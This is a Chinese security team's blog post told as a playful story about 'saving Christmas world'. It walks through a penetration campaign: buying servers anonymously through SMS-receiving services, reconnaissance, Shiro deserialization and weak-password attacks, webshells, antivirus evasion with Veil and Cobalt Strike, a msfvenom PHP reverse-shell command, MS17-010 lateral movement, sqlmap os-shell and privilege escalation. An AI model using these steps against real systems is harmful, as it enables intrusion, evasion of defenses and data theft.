拯救圣誕世界

注：本文首發地址：https://www.sec-in.com
文章作者為-句芒安全實驗室-成員之一，歡迎微信搜索關注我們。

一、背景

“歡迎來到圣誕世界，它糟透了，但你會喜歡的。”
? ? ? ? ? ? ? ? ? ?——————圣誕智者

? ? 2020年某年某月某日某個凌晨，隨著一聲“vktr”，你緊緊地握著手中的手機，心滿意足的閉上了眼睛，你的意識逐漸模糊，緊接著，你的身體無力的壓住了桌上的MAC。在之后的日子里，你從一個名不經傳的小人物成了新聞的焦點，遺憾的是你卻沒有機會看到這一刻。
? ? 圣誕世界，被遺棄的文明，此時正面臨一場網絡戰爭。能夠拯救世界的方法只有喚醒巨人。可喚醒巨人的方法被敵人偷走了，現在你臨危受命，需要幫助世界拿到拯救巨人的方法。接下來你會收到一份名單，這將是你的重點目標，根據線人情報，秘密會藏在某一個目標中。
? ? 現在你可以針對他們進行攻擊，但我們只能為你爭取一周的時間。并且你需要注意不要被對方發現，我們將為你提供一個情報據點，兩套裝備以及10$的資金支持，當你獲得那個秘密后，你可以隨時把你的成果匯報到我們的據點。最后，你只有完成任務，你才可以回到你的世界。接下里，交給你了！
? ? 智者奇思妙向會指引你前進。

二、藏身

接到目標的你需要幾臺匿名服務器來支持你發起進攻。你可以去網上看看，祝你好運。 --智者奇思妙向

? ? 于是你拿著10$準備購買其他世界的服務器進行進攻，幾經對比，你選擇了vultr(https://www.vultr.com)作為你的服務商，首先它根據服務器配置不同按時收費，其次可以鏡像還原，最后用完即可銷毀。
? ?它滿足你用時短，資金不足，可鏡像，可立即銷毀的需求。你感覺很滿意。
? ?可是當你購買的時候，你發現你需要注冊一個賬號。而注冊賬號需要郵箱。注冊郵箱需要手機號。手機號和你的身份ID綁定。這意味著當你面臨某些意外時，你不再安全。
? ?可你是一個聰明人，你知道事情的源頭出在了手機號的問題上。你當然會解決這個問題。
? ?于是你準備了一臺干干凈凈的機子，掛上了不知道從哪里來的代理，找到了一個接碼平臺(https://www.yinsiduanxin.com）。
? ?你想利用接碼平臺來注冊一個郵箱，于是你嘗試了126、163等幾個郵箱服務商，可你發現虛擬號碼并不支持，你不想在這件事上花費太多的精力，于是你google了幾家國外的郵件服務商準備利用接碼平臺中其他國家的手機號進行注冊，一番操作后你發現很多手機號已經注冊過郵箱了，當你測試第N個服務商后，發現依舊提示手機號已被注冊，你決定換個思路，于是你選擇了密碼找回，并選擇了zoho(https://mail.zoho.com)。
? ?只是因為眼前剛好是它。這次的事情出乎意料的順利，你發現可以通過短信驗證碼登錄，于是你利用接碼平臺順利的登錄了上去。
? ?現在，你擁有了一個匿名郵箱，雖然它存在公用的風險。緊接著你利用這個郵箱注冊了vultr的賬號，注冊登錄后你需要再往郵箱發送一封確認的郵件，之后你回到郵箱點擊確認連接，最后，你在點擊激活后把郵件從郵箱中徹底刪除。
? ?至此，你擁有了一個完全匿名的vultr賬號。唯一遺憾的是你需要充值的時候銀行卡會產生一筆服務器消費的記錄，可以感到稍微慶幸的是即使得知你有充值行為，你依舊擁有即時銷毀服務器的能力以此來增加自己的安全系數。

注：事后發現outlook的郵箱注冊不需要手機驗證碼。

三、武器

工欲善其事，必先利其器。 --智者奇思妙向

? ?擁有了服務器的你感到信心大增，你開通一臺ubutu的服務器，并且將x-ray、awvs等配置完成并鏡像了3臺服務器，以應對接下來的打點戰斗。

四、情報

知己知彼百戰百勝。 --智者奇思妙向

緊接著你開始了對目標信息的搜集
內容包括
·目標域名
·目標域名真實IP
·目標域名真實IP全端口
·目標子域名
·目標子域名真實IP
·目標子域名真實IP的全端口

收集資產的途徑：
1.利用子域名查詢爆破工具（subdomainbrute、sublist3、ksubdomain）

subDomainsBrute:https://github.com/lijiejie/subDomainsBrutesublist3:https://github.com/aboul3la/Sublist3rksubdomain:https://github.com/knownsec/ksubdomain

2.利用fofa、zooeye、shodan、谷歌、百度等搜索引擎

以域名后綴搜索，如*.com，加上地理位置等條件 以關鍵字搜索，給定目標中的某些關鍵字，或titile中包含XX國、XX省，可加上地理位置或不包含某些關鍵字來提高精確性

3.目標網站頁面上的直屬單位地址等
4.通過關鍵字搜索相關的微信小程序、公眾號
5.通過關鍵字從應用商店搜索相關的APP
6.github關鍵字搜索目標相關信息
7.目標相關的第三方供應鏈

? ?以上資產收集整理匯總后，會得到多份URL清單，針對此清單，進行分批，第一批為目標域名及其子域名，第二批為利用關鍵字搜索得到的資產，第三批為微信小程序、公眾號、APP等。
? ?針對以上獲取的內容提取真實IP并判斷是否有CDN，存在CDN的全部忽略，得到一批真實IP后對IP進行全端口掃描并獲取其banner信息，針對相應服務，如ssh、mysql等服務及tomcat等存在后臺的網站進行弱口令掃描。

五、進攻

斷敵十指，不如傷其一臂。 --智者奇思妙向

? ?通過對上面工作的整理，你的運氣很好，發現了N個存在弱口令、shiro反序列化和注入的網站。
對于命令執行類漏洞，比如shiro反序列化你是這樣做的：
1.輸入目標地址，點擊下一步

2.選擇檢測方法

3.如果發現目標存在漏洞，可在此界面反彈shell或上傳文件

如果上傳指定shell，修改config文件下的shell.jsp文件

例如，你想上傳一個冰蝎的馬只需要把shell.jsp里的內容改為冰蝎馬的內容

之后選擇寫入位置，即可。
之后利用此漏洞上傳的一個冰蝎馬，獲取到了webshell權限。

你查看了當前用戶的權限，為管理員權限

為了更方便的操作，你決定上傳一個CS的木馬，發現被直接查殺，然后你查看了一下進程，發現服務器上存在安全防護軟件。然后你的腦海里回憶出你測試過的幾種方法。
比如利用cs生成veil的payload，之后利用veil使用go編譯來達到免殺的效果。

#Veil by pass360
一、CS生成shellcode




二、安裝veil
安裝docker:

pull mattiasohlsson/veil

啟動docker :

run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

生成的所有文件在主機的/tmp/veil-output/目錄下，
compiled目錄下為exe文件
source目錄下為go文件

三、veil免殺過360




[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-SYmkaD3Q-1617346566001)(https://gitee.com/lyxy-all/img-mweb/raw/master/20210402145510.jpg)]


測試360：

CS上線：

比如遇到火絨可通過msf生成php的馬，之后通過php轉exe軟件進行msf的上線。

#msf php to exe bypass av
1.生成php木馬

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.211.55.3 LPORT=3333 -f raw > payload.php

2.去掉開頭的/*
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-0olFx7wR-1617346566003)(https://gitee.com/lyxy-all/img-mweb/raw/master/20210402145516.jpg)]
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-0MPZIkcs-1617346566003)(https://gitee.com/lyxy-all/img-mweb/raw/master/20210402145517.jpg)]
3.利用bamcompile進行格式轉換

bamcompile.exe -w -c payload.php payload.exe

若遇到其他殺毒可以試試掩日，也是一款不錯的工具。

#掩日

https://github.com/1y0n/AV_Evasion_Tool

接著你通過上面的免殺上線了目標機器

你利用CS插件對內網ms17010進行探測

你發現了幾臺內網機器存在問題，你對存在ms17010漏洞的機器進行了利用，
你獲取到了一臺system權限的主機

你翻查主機發現了大量的情報，你感覺事情太順利，緊接著你準備一鼓作氣看看其它的網站。你利用同樣的方法不斷的獲取敵方的情報，接下來你遇到了一點小問題，目標不出網，然后你可以選擇冰蝎自帶的代理一鍵開啟，可以利用cs，也可以利用Neo-reGeorg,來進行正向連接，方法N+1。

一般可以直接用網站的代理，如果覺得不穩定，比如網站容易掛掉，可以上傳個CS的馬通過服務器回連。
本地可以安裝proxychain來進行代理。針對內網資產探測也可以使用goby,perun等等.
對于存在注入的網站，你使用sqlmap命令

sqlmap -r 1.txt --risk=3 --level=5 --batch -v3

接著嘗試通過注入獲取數據庫賬號密碼，并嘗試破解明文，以期進入后臺進一步擴大成果。你對dba權限的也嘗試–os-shell參數，萬一運氣好呢？
你很幸運的拿到管理賬號密碼，即使不可以如果得到普通用戶的賬號密碼也可以。
比如你拿到某個用戶賬號密碼登入系統發現該OA系統集成了郵件功能，你發現了大量的敏感文件及內部人員聯系方式，這為你進一步進攻有提供了良好的支持。
對于弱口令，若是ssh服務器簡直天賜良機，你直接通過代理上去，再代理橫掃內網。如果權限不夠，你可是試試suid提權

https://gtfobins.github.io/

如果你不擔心服務器出現問題，還可以嘗試下臟牛提權。

經過艱苦卓絕的戰斗，你已經掌握了大量的敵軍情報，你將情報整理加密后傳給了后方據點。根據據點情報的進一步反饋，最終你成功的獲得了復活巨人的秘密。

六、總結

溫故而知新。 --智者奇思妙向

? ?達成目的你功成身退，并在事后你得知同時嘗試拯救世界的還有其他成員，你們被聚集在了一起，你們獲得了很好的交流機會。比如有的成員通過供應鏈，有的成員提前已經打入敵軍內部，有的成員通過誘惑敵方人員，總之花樣百出，通過和其他成員的交流，你收獲良多。

你對大致流程做了總結：

1.通過匿名隱藏自己 2.多渠道收集資產信息 3.批量探測漏洞 4.人工驗證利用 5.內網進一步擴大戰果 6.事后與其他成員交流思路 7.復盤總結，查缺補漏進一步提高自己

七、喚醒巨人的秘密

? ?最后，圣誕世界利用你得到的秘密成功復活了巨人，巨人拯救了圣誕世界，世界一片歡騰。

圣誕歷，公元2233年，世界面臨戰爭，傳說只有喚醒巨人才可以拯救世界，而喚醒巨人的唯一方式就是：大古熬成湯。 --摘自《智者奇思妙向回憶錄》

總結

以上是生活随笔為你收集整理的拯救圣诞世界的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。